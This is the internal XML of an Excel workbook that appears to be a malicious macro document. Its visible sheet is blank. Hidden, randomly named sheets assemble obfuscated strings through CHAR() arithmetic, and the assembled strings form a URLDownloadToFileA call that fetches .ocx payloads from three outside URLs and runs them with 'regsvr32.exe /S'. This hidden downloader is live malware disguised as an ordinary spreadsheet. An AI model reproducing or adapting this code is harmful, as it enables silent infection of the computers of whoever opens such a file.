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0"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet" sheetId="1" r:id="rId1"/>
    <sheet name="IRPSHJSRH1" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="IRPSHJSRH2" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="IRPSHJSRH3" sheetId="4" state="hidden" r:id="rId4"/>
  </sheets>
  <definedNames/>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="31" uniqueCount="31">
  <si>
    <t>X</t>
  </si>
  <si>
    <t>h</t>
  </si>
  <si>
    <t>d</t>
  </si>
  <si>
    <t>"</t>
  </si>
  <si>
    <t>:</t>
  </si>
  <si>
    <t>=</t>
  </si>
  <si>
    <t>,</t>
  </si>
  <si>
    <t>\</t>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>L</t>
  </si>
  <si>
    <t>&amp;</t>
  </si>
  <si>
    <t>(</t>
  </si>
  <si>
    <t>U</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>)</t>
  </si>
  <si>
    <t>T</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>R</t>
  </si>
  <si>
    <t>E</t>
  </si>
  <si>
    <t>N</t>
  </si>
  <si>
    <t>RET</t>
  </si>
  <si>
    <t>()</t>
  </si>
  <si>
    <t>URN</t>
  </si>
  <si>
    <t>e</t>
  </si>
  <si>
    <t>p</t>
  </si>
  <si>
    <t>://hathaabeach.com/documents/xbZxXi/","</t>
  </si>
  <si>
    <t>://tekstiluzmangorusu.com/wp-admin/VThSCtERM5Hj/","</t>
  </si>
  <si>
    <t>://zhivir.com/wp/yrqupT1QwXuRdX3/","</t>
  </si>
  <si>
    <t>1","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</si>
</sst>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1F2F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361950</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>257175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57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D69" sqref="D69"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15"/>
  <sheetData>
    <row r="1" s="1" customFormat="1" ht="21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">
      <selection activeCell="J18" sqref="J18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15"/>
  <sheetData>
    <row r="1" ht="15">
      <c r="Q1" t="str">
        <f>CHAR(102/2)</f>
        <v>3</v>
      </c>
    </row>
    <row r="2" spans="5:19" ht="15">
      <c r="E2" t="str">
        <f>CHAR(216/2)</f>
        <v>l</v>
      </c>
      <c r="K2" t="str">
        <f>CHAR(35*2)</f>
        <v>F</v>
      </c>
      <c r="S2" t="str">
        <f>CHAR(100-35)</f>
        <v>A</v>
      </c>
    </row>
    <row r="3" spans="2:21" ht="15">
      <c r="B3" t="str">
        <f>CHAR(236-118)</f>
        <v>v</v>
      </c>
      <c r="I3" t="str">
        <f>CHAR(238/2)</f>
        <v>w</v>
      </c>
      <c r="O3" t="str">
        <f>CHAR(134/2)</f>
        <v>C</v>
      </c>
      <c r="U3">
        <v>5</v>
      </c>
    </row>
    <row r="4" spans="1:20" ht="15">
      <c r="A4" t="str">
        <f>CHAR(228/2)</f>
        <v>r</v>
      </c>
      <c r="F4" t="s">
        <v>0</v>
      </c>
      <c r="M4" t="str">
        <f>CHAR(148/2)</f>
        <v>J</v>
      </c>
      <c r="Q4">
        <v>1</v>
      </c>
      <c r="T4" t="str">
        <f>CHAR(42*2)</f>
        <v>T</v>
      </c>
    </row>
    <row r="5" spans="10:19" ht="15">
      <c r="J5" t="str">
        <f>CHAR(52*2)</f>
        <v>h</v>
      </c>
      <c r="S5" t="str">
        <f>CHAR(100/2)</f>
        <v>2</v>
      </c>
    </row>
    <row r="6" spans="4:17" ht="15">
      <c r="D6" t="str">
        <f>CHAR(185-110)</f>
        <v>K</v>
      </c>
      <c r="Q6" t="str">
        <f>CHAR(220-111)</f>
        <v>m</v>
      </c>
    </row>
    <row r="7" spans="12:22" ht="15">
      <c r="L7" t="str">
        <f>CHAR(170/2)</f>
        <v>U</v>
      </c>
      <c r="V7" t="str">
        <f>CHAR(224/2)</f>
        <v>p</v>
      </c>
    </row>
    <row r="8" spans="7:16" ht="15">
      <c r="G8" t="str">
        <f>CHAR(109-40)</f>
        <v>E</v>
      </c>
      <c r="M8" t="str">
        <f>CHAR(200-100)</f>
        <v>d</v>
      </c>
      <c r="P8" t="str">
        <f>CHAR(232/2)</f>
        <v>t</v>
      </c>
    </row>
    <row r="9" ht="15">
      <c r="T9" t="str">
        <f>CHAR(194/2)</f>
        <v>a</v>
      </c>
    </row>
    <row r="10" spans="6:11" ht="15">
      <c r="F10" t="str">
        <f>CHAR(203-102)</f>
        <v>e</v>
      </c>
      <c r="K10" t="str">
        <f>CHAR(164-82)</f>
        <v>R</v>
      </c>
    </row>
    <row r="11" spans="2:17" ht="15">
      <c r="B11" t="str">
        <f>CHAR(220/2)</f>
        <v>n</v>
      </c>
      <c r="H11">
        <v>4</v>
      </c>
      <c r="O11" t="str">
        <f>CHAR(96/2)</f>
        <v>0</v>
      </c>
      <c r="Q11" t="str">
        <f>CHAR(136/2)</f>
        <v>D</v>
      </c>
    </row>
    <row r="13" spans="8:19" ht="15">
      <c r="H13" t="str">
        <f>CHAR(166/2)</f>
        <v>S</v>
      </c>
      <c r="L13" t="str">
        <f>CHAR(33*2)</f>
        <v>B</v>
      </c>
      <c r="S13" t="str">
        <f>CHAR(210/2)</f>
        <v>i</v>
      </c>
    </row>
    <row r="14" spans="5:14" ht="15">
      <c r="E14" t="str">
        <f>CHAR(240-120)</f>
        <v>x</v>
      </c>
      <c r="N14" t="str">
        <f>CHAR(217-100)</f>
        <v>u</v>
      </c>
    </row>
    <row r="15" spans="9:16" ht="15">
      <c r="I15" t="s">
        <v>1</v>
      </c>
      <c r="P15" t="str">
        <f>CHAR(202-103)</f>
        <v>c</v>
      </c>
    </row>
    <row r="16" spans="3:20" ht="15">
      <c r="C16" t="str">
        <f>CHAR(206-103)</f>
        <v>g</v>
      </c>
      <c r="M16" t="str">
        <f>CHAR(152-76)</f>
        <v>L</v>
      </c>
      <c r="T16" t="str">
        <f>CHAR(242/2)</f>
        <v>y</v>
      </c>
    </row>
    <row r="17" spans="6:18" ht="15">
      <c r="F17" t="s">
        <v>2</v>
      </c>
      <c r="G17" t="s">
        <v>26</v>
      </c>
      <c r="R17" t="str">
        <f>CHAR(212-101)</f>
        <v>o</v>
      </c>
    </row>
    <row r="18" ht="15">
      <c r="O18" t="str">
        <f>CHAR(230/2)</f>
        <v>s</v>
      </c>
    </row>
    <row r="21" ht="15">
      <c r="U21">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="6:12" ht="15">
      <c r="F24" t="s">
        <v>3</v>
      </c>
      <c r="H24" t="s">
        <v>4</v>
      </c>
      <c r="L24" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="26" spans="6:12" ht="15">
      <c r="F26" t="s">
        <v>6</v>
      </c>
      <c r="H26" t="s">
        <v>7</v>
      </c>
      <c r="L26" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="27" ht="15">
      <c r="L27" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="28" spans="6:12" ht="15">
      <c r="F28" t="str">
        <f>CHAR(32)</f>
        <v> </v>
      </c>
      <c r="H28" t="s">
        <v>10</v>
      </c>
      <c r="L28" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="29" ht="15">
      <c r="F29" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="30" ht="15">
      <c r="L30" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="31" spans="6:12" ht="15">
      <c r="F31" t="s">
        <v>14</v>
      </c>
      <c r="H31" t="s">
        <v>15</v>
      </c>
      <c r="L31" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="32" ht="15">
      <c r="C32" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="33" ht="15">
      <c r="H33" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="36" ht="15">
      <c r="E36" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="38" ht="15">
      <c r="C38" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="42" ht="15">
      <c r="E42" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="44" spans="7:10" ht="15">
      <c r="G44" t="s">
        <v>22</v>
      </c>
      <c r="J44" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="46" ht="15">
      <c r="H46" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="50" ht="15">
      <c r="L50" t="s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9"/>
  <sheetViews>
    <sheetView zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A4">
      <selection activeCell="H20" sqref="H20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15"/>
  <sheetData>
    <row r="2" ht="15">
      <c r="H2" t="str">
        <f>T(IRPSHJSRH1!R17&amp;IRPSHJSRH1!I3&amp;IRPSHJSRH1!B11&amp;IRPSHJSRH1!E2&amp;IRPSHJSRH1!R17&amp;IRPSHJSRH1!T9&amp;IRPSHJSRH1!M8&amp;IRPSHJSRH1!T4&amp;IRPSHJSRH1!R17&amp;IRPSHJSRH1!K2&amp;IRPSHJSRH1!S13&amp;IRPSHJSRH1!E2)</f>
        <v>ownloadToFil</v>
      </c>
    </row>
    <row r="5" ht="15">
      <c r="L5" t="str">
        <f>T(IRPSHJSRH1!S2&amp;IRPSHJSRH1!F24&amp;IRPSHJSRH1!F26&amp;IRPSHJSRH1!F24&amp;IRPSHJSRH1!M4&amp;IRPSHJSRH1!M4&amp;IRPSHJSRH1!O3&amp;IRPSHJSRH1!O3&amp;IRPSHJSRH1!L13&amp;IRPSHJSRH1!L13&amp;IRPSHJSRH1!F24)</f>
        <v>A","JJCCBB"</v>
      </c>
    </row>
    <row r="6" ht="15">
      <c r="B6" t="str">
        <f>T(IRPSHJSRH1!L30&amp;IRPSHJSRH1!F24&amp;IRPSHJSRH1!N14&amp;IRPSHJSRH1!A4&amp;IRPSHJSRH1!E2&amp;IRPSHJSRH1!Q6&amp;IRPSHJSRH1!R17)</f>
        <v>("urlmo</v>
      </c>
    </row>
    <row r="10" ht="15">
      <c r="E10" t="str">
        <f>T(IRPSHJSRH1!B11&amp;IRPSHJSRH1!F24&amp;IRPSHJSRH1!F26&amp;IRPSHJSRH1!F24&amp;IRPSHJSRH1!L7&amp;IRPSHJSRH1!K10&amp;IRPSHJSRH1!M16&amp;IRPSHJSRH1!Q11)</f>
        <v>n","URLD</v>
      </c>
    </row>
    <row r="17" spans="5:7" ht="15">
      <c r="E17" t="s">
        <v>30</v>
      </c>
      <c r="G17" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="19" spans="6:8" ht="15">
      <c r="F19" t="s">
        <v>27</v>
      </c>
      <c r="H19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6:S29"/>
  <sheetViews>
    <sheetView zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A10">
      <selection activeCell="K26" sqref="K26"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15"/>
  <sheetData>
    <row r="6" ht="15">
      <c r="D6" t="str">
        <f>T(IRPSHJSRH1!F26&amp;IRPSHJSRH1!O11&amp;IRPSHJSRH1!F26&amp;IRPSHJSRH1!F24&amp;IRPSHJSRH1!J5&amp;IRPSHJSRH1!P8&amp;IRPSHJSRH1!P8&amp;IRPSHJSRH1!G17)</f>
        <v>,0,"http</v>
      </c>
    </row>
    <row r="7" ht="15">
      <c r="K7" t="str">
        <f>T(IRPSHJSRH1!I15&amp;IRPSHJSRH1!J5&amp;IRPSHJSRH1!I3&amp;IRPSHJSRH1!F10&amp;IRPSHJSRH1!S5&amp;IRPSHJSRH1!H28&amp;IRPSHJSRH1!R17&amp;IRPSHJSRH1!P15&amp;IRPSHJSRH1!E14)</f>
        <v>hhwe2.ocx</v>
      </c>
    </row>
    <row r="10" ht="15">
      <c r="F10" t="str">
        <f>T(IRPSHJSRH1!I15&amp;IRPSHJSRH1!J5&amp;IRPSHJSRH1!I3&amp;IRPSHJSRH1!F10&amp;IRPSHJSRH1!Q4&amp;IRPSHJSRH1!H28&amp;IRPSHJSRH1!R17&amp;IRPSHJSRH1!P15&amp;IRPSHJSRH1!E14)</f>
        <v>hhwe1.ocx</v>
      </c>
    </row>
    <row r="13" spans="10:17" ht="15">
      <c r="J13" t="str">
        <f>T(IRPSHJSRH1!H28&amp;IRPSHJSRH1!H28&amp;IRPSHJSRH1!H26)</f>
        <v>..\</v>
      </c>
      <c r="Q13" t="str">
        <f>T(IRPSHJSRH1!F10&amp;IRPSHJSRH1!C16&amp;IRPSHJSRH1!O18&amp;IRPSHJSRH1!B3)</f>
        <v>egsv</v>
      </c>
    </row>
    <row r="14" ht="15">
      <c r="B14" t="str">
        <f>TEXT("System32\",464674)</f>
        <v>System32\</v>
      </c>
    </row>
    <row r="18" ht="15">
      <c r="N18" t="str">
        <f>T(IRPSHJSRH1!F24&amp;IRPSHJSRH1!F26&amp;IRPSHJSRH1!O11&amp;IRPSHJSRH1!F26&amp;IRPSHJSRH1!O11&amp;IRPSHJSRH1!L31)</f>
        <v>",0,0)</v>
      </c>
    </row>
    <row r="19" ht="15">
      <c r="D19" t="str">
        <f>T(IRPSHJSRH1!Q1&amp;IRPSHJSRH1!S5&amp;IRPSHJSRH1!H28&amp;IRPSHJSRH1!F10&amp;IRPSHJSRH1!E14)</f>
        <v>32.ex</v>
      </c>
    </row>
    <row r="21" ht="15">
      <c r="J21" t="str">
        <f>TEXT(":\Windows\",3634)</f>
        <v>:\Windows\</v>
      </c>
    </row>
    <row r="22" ht="15">
      <c r="S22" t="str">
        <f>T(IRPSHJSRH1!I15&amp;IRPSHJSRH1!J5&amp;IRPSHJSRH1!I3&amp;IRPSHJSRH1!F10&amp;IRPSHJSRH1!Q1&amp;IRPSHJSRH1!H28&amp;IRPSHJSRH1!R17&amp;IRPSHJSRH1!P15&amp;IRPSHJSRH1!E14)</f>
        <v>hhwe3.ocx</v>
      </c>
    </row>
    <row r="24" ht="15">
      <c r="E24" t="str">
        <f>T(IRPSHJSRH1!F28&amp;IRPSHJSRH1!H28&amp;IRPSHJSRH1!H28&amp;IRPSHJSRH1!H26)</f>
        <v> ..\</v>
      </c>
    </row>
    <row r="25" ht="15">
      <c r="K25" t="str">
        <f>T(IRPSHJSRH1!I15&amp;IRPSHJSRH1!J5&amp;IRPSHJSRH1!I3&amp;IRPSHJSRH1!F10&amp;IRPSHJSRH1!H11&amp;IRPSHJSRH1!H28&amp;IRPSHJSRH1!R17&amp;IRPSHJSRH1!P15&amp;IRPSHJSRH1!E14)</f>
        <v>hhwe4.ocx</v>
      </c>
    </row>
    <row r="29" ht="15">
      <c r="G29" t="str">
        <f>T(IRPSHJSRH1!F28&amp;IRPSHJSRH1!H33&amp;IRPSHJSRH1!H13)</f>
        <v> /S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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>RHRSDJTJDGHT</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:19:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-13T08:16:54Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>